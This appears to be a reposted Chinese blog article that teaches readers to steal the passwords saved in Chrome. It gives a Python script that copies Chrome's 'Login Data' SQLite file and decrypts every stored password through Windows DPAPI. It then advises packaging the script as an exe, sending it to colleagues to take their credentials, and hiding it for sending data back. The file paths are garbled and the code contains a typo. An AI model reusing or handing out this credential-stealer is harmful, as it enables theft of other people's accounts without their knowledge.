使用Python假装装黑客，批量破解朋友的网站密码

 如何破解iphone登陆密码

今天看了一篇关于如何破解iphone手机密码的文章，瞬间觉得科学技术不是第一生产力，why?

根据“可靠消息”称，即便美国FBI也无法轻易的对iphone手机进行暴力破解，当然美国有一家黑客公司可针对iphone进行破解，单收费过万美金。

那么铺天盖地的iphone手机密码破解“黑客”是怎么做的?

无非是骗，他们假装成各类官方人员告诉你发现你的iphone手机存在异常，需要远程告知apple_id帮你追回手机，呵呵….

可是，这个梗和今天的文章有什么关系呢?

黑客的自我修养

随着Python的活跃，各大平台都在鼓吹，甚至已经出了关于python黑客入门的书籍。

也许做一个黑客难如登天，那不如我们换个思路，去假装做一个伪黑客如何?

前几天看帖子，发现我们使用浏览器的时候，当登陆一个需要输入用户名密码的网站时，在你登陆成功后，系统会提示你是否保存密码，如果点击确认，浏览器将会把我们本次输入的密码，存储在浏览器中，待下次登录时便可以免密登录。

那么，这些密码是怎么保存的，又存储在哪里呢?

Chrome浏览器

也许很多人会说，360浏览器、QQ浏览器，这些国产的加壳浏览器不论美观还是所谓的安全方面都做的很符合国人需求。但如果你的工作与IT挂钩，无疑Chrome将是很多朋友的首选。当然这篇文章不是介绍Chrome浏览器的使用手册，今天我们主要来看看Chrome浏览器的密码存储机制。

查看Chrome存储的密码表单

点击你们的Chrome浏览器右上角，进入设置->高级->管理密码(根据浏览器版本不同，可能存在部分差异)，亦或者在Chrome浏览器中输入chrome://settings/passwords。你会看到很多已保存过的密码表单信息，当然如果你要查看密码详情，就要输入电脑的系统管理员密码。

那么，Chrome的密码是以什么方式进行存储的呢?SQLite…

很多嵌入式产品中，都会使用SQLite数据库进行数据存储，它占用资源低，数据库即文件，又支持sql语法的增删改查，简直不要太方便

SQLite在哪，又该怎么查询?

首先，进入我的电脑，地址栏中输入%LOCALAPPDATA%,进入app的数据存储路径：

C:UsersAdministratorAppDataLocal 

之后进入chrome浏览器的密码数据库统一地址为：

GoogleChromeUser DataDefaultLogin Data 

查看Chrome浏览器存储的密码

既然拿到了SQLite数据库文件，我们随便找个sqlite工具，就能打开这个数据库了!

这里我使用sqlitestudio：

数据库信息展示.png

打开数据库，我们看到有三张表：

logins 、meta、 stats

其中logins中就存储这你保存的网址、用户名、密码数据，分别是:

signon_realm,username_value,password_value

但问题来了，password_value的字段看着是空的啊?因为加密了!

如何解密?网上查了下：

CryptUnprotectData数据可以在win32crypt中找到，要使用该模块，需要进行安装： 
pip install pywin32 
万事俱备，就差撸代码了！ 

pip install pywin32

万事俱备，就差撸代码了!

代码实现

1import os 
 2import shutil 
 3import sqlite3 
 4import win32crypt 
 5 
 6db_file_path = os.path.join(os.environ['LOCALAPPDATA'], r'GoogleChromeUser DataDefaultLogin Data') 
 7 
 8tmp_file = os.path.join(os.environ['LOCALAPPDATA'], 'sqlite_file') 
 9print(tmp_file) 
10if os.path.exists(tmp_file): 
11    os.remove(tmp_file) 
12shutil.copyfile(db_file_path, tmp_file) 
13 
14conn = sqlite3.connect(tmp_file) 
15for row in conn.execute('select signon_realm,username_value,password_value from logins'): 
16    ret = win32crypt.CryptUnprotectData(row[2], None, None, N one, 0) 
17    print('网站：%-50s，用户名：%-20s，密码：%s' % (row[0][:50], row[1], ret[1].decode('gbk'))) 
18 
19conn.close() 
20os.remove(tmp_file) 

通过解密，我们获取到了Chrome浏览器保存的用户名密码，然后保存至文本。

获取到的本地密码.png

之后我们只需要使用pyinstaller -F xxx.py,将代码打包成exe发给同事，就可以在他的电脑上获取密码了!

但，如果咱们的黑客之旅到此为止，那这个伪黑客未免有点low了吧?

数据回传

为什么说要打包成exe?一是可以脱离环境单独执行，二却是为了加壳!

（编辑：厦门网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!